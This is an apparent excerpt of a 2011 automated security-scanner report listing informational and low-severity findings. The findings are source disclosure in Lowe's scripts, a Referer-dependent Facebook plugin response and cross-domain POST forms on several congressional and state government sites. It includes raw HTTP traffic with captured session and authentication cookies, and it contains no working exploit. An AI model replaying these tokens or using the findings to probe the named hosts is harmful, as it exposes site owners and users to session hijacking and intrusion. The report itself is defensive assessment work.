Cookie: MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; cmSessionDepth=5; JSESSIONID=00006p0iP0nvmoy5cq0R483AFmL:14e1gr6ig; WC_SESSION_ESTABLISHED=true; WC_AUTHENTICATION_-1002=%2d1002%2cTYVD85anmjhYyITkSpmh9zJVTEc%3d; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TyvbcdVzvDpby%0a%2feY9VaffAc4y09NidpOD25XJ20Mzq3kFHMtHKZG5cVZbMeQ1YmOSeUpTBUkQnCB6RygNDVVlHA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2897564122%3atrue%3afalse%3a0%3aOT%2bvDkUlulLUJRWcNU3dyXdQe3g%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; TS176ebc=213d8656075767f35a1f9b520e396fbdceb6ace724ef15e34e1cfb7e; stop_mobi=yes; akaau=1310524386~id=21017306f05776f813565f0d22f0d790

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 07 Jul 2011 16:52:15 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 116111
Expires: Wed, 13 Jul 2011 02:03:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 02:03:11 GMT
Connection: keep-alive
Vary: Accept-Encoding

/*
This is to ensure that a console object is always available as well as it...s many methods.
*/

if (!window.console || !console.firebug){
var methods = ["log", "debug", "info", "warn", "error"
...[SNIP]...
s subject to the Lowes.com Terms and Conditions.
* You may not port this file to another platform without Lowes.com's written consent.
*/

/**
* @Package Lowes.Cookie
* @Author WCope
* @version <%=VERSION=%>
*/

(function(){
   // Grab Lowes namespace object or create a new one.
   var Lowes = window.Lowes || {};

   /**
    * Class for working with browser cookies. Simplifies setting, getting, deleting
   *
    * @
...[SNIP]...
is subject to the Lowes.com Terms and Conditions.
* You may not port this file to another platform without Lowes.com's written consent.
*/

/**
* @Package Lowes.Prefs
* @Author Wcope
* @version <%=VERSION=%>
*/

(function(){
// Grab Lowes namespace object or create a new one.
var Lowes = window.Lowes || {};

/**
   * Simplified Cookie based preferences for users
   */
var Prefs = {
    // Store
...[SNIP]...
is subject to the Lowes.com Terms and Conditions.
* You may not port this file to another platform without Lowes.com's written consent.
*/

/**
* @Package Lowes.Utils
* @Author WCope
* @version <%=VERSION=%>
*/

(function(){
   // Grab Lowes namespace object or create a new one.
   var Lowes = window.Lowes || {};

   Lowes.PageTypes = {
       Other        : 0,
       List        : 1,
       Details        : 2,
       Category    : 3
   };

   var Util
...[SNIP]...
hout Lowes.com's written consent.
*/

/**
* Lowes.UI Namespace Object that will be the parent of all
* Lowes UI components library classes.
*
* @Package: Lowes.UI
* @Author WCope
* @version <%=VERSION=%>
*/

;(function($){
   // Grab Lowes namespace object or create a new one.
   var Lowes = window.Lowes || {};

   // Grab Lowes UI namespace object or create a new one.
   Lowes.UI = Lowes.UI || {};

   // Sil
...[SNIP]...
Terms and Conditions.
* You may not port this file to another platform without Lowes.com's written consent.
*/

/**
* @Package Lowes.UI.Accordion
* @member Lowes.UI
* @Author WCope
* @version <%=VERSION=%>
*/

;(function($){
   // Grab Lowes namespace object or create a new one.
   var Lowes = window.Lowes || {};

   // Grab Lowes UI namespace object or create a new one.
   Lowes.UI = Lowes.UI || {};

   // Qui
...[SNIP]...
m Terms and Conditions.
* You may not port this file to another platform without Lowes.com's written consent.
*/

/**
* @Package Lowes.UI.Carousel
* @member Lowes.UI
* @Author MHead
* @version <%=VERSION=%>
*/
;(function($){
   // Grab Lowes namespace object or create a new one.
   var Lowes = window.Lowes || {};

   // Grab Lowes UI namespace object or create a new one.
   Lowes.UI = Lowes.UI || {};

   // Quic
...[SNIP]...
.com Terms and Conditions.
* You may not port this file to another platform without Lowes.com's written consent.
*/

/**
* @Package Lowes.UI.Modal
* @member Lowes.UI
* @Author WCope
* @version <%=VERSION=%>
*/

;(function($){
   // Grab Lowes namespace object or create a new one.
   var Lowes = window.Lowes || {};

   // Grab Lowes UI namespace object or create a new one.
   Lowes.UI = Lowes.UI || {};

   // Qui
...[SNIP]...
s.com Terms and Conditions.
* You may not port this file to another platform without Lowes.com's written consent.
*/

/**
* @Package Lowes.UI.Tabs
* @member Lowes.UI
* @Author WCope
* @version <%=VERSION=%>
*/

;(function($){
   // Grab Lowes namespace object or create a new one.
   var Lowes = window.Lowes || {};

   // Grab Lowes UI namespace object or create a new one.
   Lowes.UI = Lowes.UI || {};

   // Qui
...[SNIP]...
Terms and Conditions.
* You may not port this file to another platform without Lowes.com's written consent.
*/

/**
* @Package Lowes.UI.Slideshow
* @member Lowes.UI
* @Author MHead
* @version <%=VERSION=%>
*/

;(function($){
   // Grab Lowes namespace object or create a new one.
   var Lowes = window.Lowes || {};

   // Grab Lowes UI namespace object or create a new one.
   Lowes.UI = Lowes.UI || {};

   // Qui
...[SNIP]...

9.2. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/lowesjs/memberGroup.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	https://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/javascript/lowesjs/memberGroup.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/javascript/lowesjs/memberGroup.js HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; cmSessionDepth=5; JSESSIONID=00006p0iP0nvmoy5cq0R483AFmL:14e1gr6ig; WC_SESSION_ESTABLISHED=true; WC_AUTHENTICATION_-1002=%2d1002%2cTYVD85anmjhYyITkSpmh9zJVTEc%3d; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TyvbcdVzvDpby%0a%2feY9VaffAc4y09NidpOD25XJ20Mzq3kFHMtHKZG5cVZbMeQ1YmOSeUpTBUkQnCB6RygNDVVlHA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2897564122%3atrue%3afalse%3a0%3aOT%2bvDkUlulLUJRWcNU3dyXdQe3g%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; TS176ebc=213d8656075767f35a1f9b520e396fbdceb6ace724ef15e34e1cfb7e; stop_mobi=yes; akaau=1310524386~id=21017306f05776f813565f0d22f0d790

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 08 Dec 2010 19:23:18 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 1649
Expires: Wed, 13 Jul 2011 02:03:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 02:03:12 GMT
Connection: keep-alive
Vary: Accept-Encoding

/**
* Lowes Javascript Library.
*
* This is licensed only for use in providing the Lowes.com service,
* or any part thereof, and is subject to the Lowes.com Terms and Conditions.
* You may not port this file to another platform without Lowes.com's written consent.
*/

/**
* @Package Lowes.MemberGroup
* @Author Wcope
* @version <%=VERSION=%>
*/

(function(){
// Grab Lowes namespace object or create a new one.
var Lowes = window.Lowes || {};

/**
* Simplified Cookie based information for MemberGroups
*/
var MemberGr
...[SNIP]...

10. Referer-dependent response previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

Request 1

GET /plugins/likebox.php?id=100484820802&width=230&connections=0&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://itunes.apple.com/us/app/delaware-gov/id444422872
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; locale=en_US; datr=3GHNTeTln1shCRlV4nyEfKsc

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.252.73
X-Cnection: close
Date: Wed, 13 Jul 2011 01:59:39 GMT
Content-Length: 7938

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="Content-Language" content="en" /><script>Cavalr
...[SNIP]...
<div id="connect_widget_4e1cfc0be72f74979575128" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem"> · <a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem"> · <a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem"> · <a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text">16,009,401</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem"> · <a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem"> · <a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem"> · <a class="connect_widget_error_text">Error</a></span
...[SNIP]...

Request 2

GET /plugins/likebox.php?id=100484820802&width=230&connections=0&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; locale=en_US; datr=3GHNTeTln1shCRlV4nyEfKsc

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.131.61
X-Cnection: close
Date: Wed, 13 Jul 2011 01:59:52 GMT
Content-Length: 7879

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="Content-Language" content="en" /><script>Cavalr
...[SNIP]...
<div id="connect_widget_4e1cfc1877f4a9926127751" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem"> · <a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem"> · <a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem"> · <a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text">16,009,405</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem"> · <a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem"> · <a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem"> · <a class="connect_widget_error_text">Error</a></span
...[SNIP]...

11. Cross-domain POST previous next
There are 24 instances of this issue:

http://buerkle.house.gov/
http://buerkle.house.gov/
http://clarke.house.gov/
http://clarke.house.gov/
http://grimm.house.gov/
http://grimm.house.gov/
http://hanna.house.gov/
http://hanna.house.gov/
http://israel.house.gov/
http://israel.house.gov/
http://nj.gov/nj/includes/styles/slideshow.css
http://owens.house.gov/
http://owens.house.gov/
http://peteking.house.gov/
http://rangel.house.gov/
http://tonko.house.gov/
http://tonko.house.gov/
http://www.buckthebuckleupdog.org/
http://www.dos.state.ny.us/
http://www.gnu.org/licenses/gpl.html
http://www.louise.house.gov/
http://www.nj.gov/nj/includes/scripts/common_functions.js
http://www.nj.gov/nj/includes/scripts/custom_functions.js
http://www.state.nj.us/patentbank/feedback/

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

11.1. http://buerkle.house.gov/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://buerkle.house.gov
Path:	/

Issue detail

The page contains a form which POSTs data to the domain thomas.loc.gov. The form contains the following fields:

congress
database
MaxDocs
querytype
query
Enter

Request

GET / HTTP/1.1
Host: buerkle.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Drupal-Cache: HIT
ETag: "1310519430-0"
X-Generator: Drupal 7 (http://drupal.org)
Last-Modified: Wed, 13 Jul 2011 01:10:30 +0000
Vary: Cookie
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=0
Expires: Wed, 13 Jul 2011 01:51:41 GMT
Date: Wed, 13 Jul 2011 01:51:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN"
"http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" version="XHTML+RDFa 1.0" dir="ltr"

...[SNIP]...
<div class="block-content" id="billsearch" >

<form name="thomasBill" method="post" action="http://thomas.loc.gov/cgi-bin/thomas" target="_blank">
<p>
...[SNIP]...

11.2. http://buerkle.house.gov/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://buerkle.house.gov
Path:	/

Issue detail

The page contains a form which POSTs data to the domain thomas.loc.gov. The form contains the following fields:

congress
database
MaxDocs
querytype
query
Enter

Request

GET / HTTP/1.1
Host: buerkle.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Drupal-Cache: HIT
ETag: "1310519430-0"
X-Generator: Drupal 7 (http://drupal.org)
Last-Modified: Wed, 13 Jul 2011 01:10:30 +0000
Vary: Cookie
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=0
Expires: Wed, 13 Jul 2011 01:51:41 GMT
Date: Wed, 13 Jul 2011 01:51:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN"
"http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" version="XHTML+RDFa 1.0" dir="ltr"

...[SNIP]...
</form>

<form name="thomasText" method="post" action="http://thomas.loc.gov/cgi-bin/thomas" target="_blank">
<p>
...[SNIP]...

11.3. http://clarke.house.gov/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clarke.house.gov
Path:	/

Issue detail

The page contains a form which POSTs data to the domain thomas.loc.gov. The form contains the following fields:

queryc112
queryc112

Request

GET / HTTP/1.1
Host: clarke.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 35396
Content-Type: text/html; charset=utf-8
Expires: Wed, 13 Jul 2011 01:52:10 GMT
Last-Modified: Wed, 13 Jul 2011 01:51:40 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 13 Jul 2011 01:51:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="Con
...[SNIP]...
</h2>
                                               <form action="http://thomas.loc.gov/cgi-bin/query" method="post" class="form" target="_blank">
                                                   <fieldset>
...[SNIP]...

11.4. http://clarke.house.gov/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clarke.house.gov
Path:	/

Issue detail

The page contains a form which POSTs data to the domain thomas.loc.gov. The form contains the following fields:

docidc112

Request

GET / HTTP/1.1
Host: clarke.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 35396
Content-Type: text/html; charset=utf-8
Expires: Wed, 13 Jul 2011 01:52:10 GMT
Last-Modified: Wed, 13 Jul 2011 01:51:40 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 13 Jul 2011 01:51:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="Con
...[SNIP]...
</form>
                                               <form action="http://thomas.loc.gov/cgi-bin/query" method="post" class="form" target="_blank">
                                                   <fieldset>
...[SNIP]...

11.5. http://grimm.house.gov/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://grimm.house.gov
Path:	/

Issue detail

The page contains a form which POSTs data to the domain thomas.loc.gov. The form contains the following fields:

congress
database
MaxDocs
querytype
query
Enter

Request

GET / HTTP/1.1
Host: grimm.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Drupal-Cache: HIT
ETag: "1310513333-0"
X-Generator: Drupal 7 (http://drupal.org)
Last-Modified: Tue, 12 Jul 2011 23:28:53 +0000
Vary: Cookie
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=0
Expires: Wed, 13 Jul 2011 01:52:08 GMT
Date: Wed, 13 Jul 2011 01:52:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN"
"http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" version="XHTML+RDFa 1.0" dir="ltr"

...[SNIP]...
</form>

<form name="thomasText" method="post" action="http://thomas.loc.gov/cgi-bin/thomas" target="_blank">
<p>
...[SNIP]...

11.6. http://grimm.house.gov/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://grimm.house.gov
Path:	/

Issue detail

The page contains a form which POSTs data to the domain thomas.loc.gov. The form contains the following fields:

congress
database
MaxDocs
querytype
query
Enter

Request

GET / HTTP/1.1
Host: grimm.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Drupal-Cache: HIT
ETag: "1310513333-0"
X-Generator: Drupal 7 (http://drupal.org)
Last-Modified: Tue, 12 Jul 2011 23:28:53 +0000
Vary: Cookie
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=0
Expires: Wed, 13 Jul 2011 01:52:08 GMT
Date: Wed, 13 Jul 2011 01:52:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN"
"http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" version="XHTML+RDFa 1.0" dir="ltr"

...[SNIP]...
<div class="block-content" id="billsearch" >

<form name="thomasBill" method="post" action="http://thomas.loc.gov/cgi-bin/thomas" target="_blank">
<p>
...[SNIP]...

11.7. http://hanna.house.gov/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hanna.house.gov
Path:	/

Issue detail

The page contains a form which POSTs data to the domain thomas.loc.gov. The form contains the following fields:

congress
database
MaxDocs
querytype
query
Enter

Request

GET / HTTP/1.1
Host: hanna.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Drupal-Cache: HIT
ETag: "1310513835-0"
X-Generator: Drupal 7 (http://drupal.org)
Last-Modified: Tue, 12 Jul 2011 23:37:15 +0000
Vary: Cookie
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=0
Expires: Wed, 13 Jul 2011 01:52:08 GMT
Date: Wed, 13 Jul 2011 01:52:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 62810

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN"
"http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" version="XHTML+RDFa 1.0" dir="ltr"

...[SNIP]...
<div class="block-content" id="billsearch" >

<form name="thomasBill" method="post" action="http://thomas.loc.gov/cgi-bin/thomas" target="_blank">
<p>
...[SNIP]...

11.8. http://hanna.house.gov/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hanna.house.gov
Path:	/

Issue detail

The page contains a form which POSTs data to the domain thomas.loc.gov. The form contains the following fields:

congress
database
MaxDocs
querytype
query
Enter

Request

GET / HTTP/1.1
Host: hanna.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Drupal-Cache: HIT
ETag: "1310513835-0"
X-Generator: Drupal 7 (http://drupal.org)
Last-Modified: Tue, 12 Jul 2011 23:37:15 +0000
Vary: Cookie
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=0
Expires: Wed, 13 Jul 2011 01:52:08 GMT
Date: Wed, 13 Jul 2011 01:52:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 62810

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN"
"http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" version="XHTML+RDFa 1.0" dir="ltr"

...[SNIP]...
</form>

<form name="thomasText" method="post" action="http://thomas.loc.gov/cgi-bin/thomas" target="_blank">
<p>
...[SNIP]...

11.9. http://israel.house.gov/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://israel.house.gov
Path:	/

Issue detail

The page contains a form which POSTs data to the domain thomas.loc.gov. The form contains the following fields:

docidc111
Enter
queryc112

Request

GET / HTTP/1.1
Host: israel.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:52:09 GMT
Server: Apache
Set-Cookie: 9523fa6c9c4a8876a77fee4eb464f789=jf10q0dted36qbpn56rdei5qo3; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 13 Jul 2011 01:52:10 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 53784
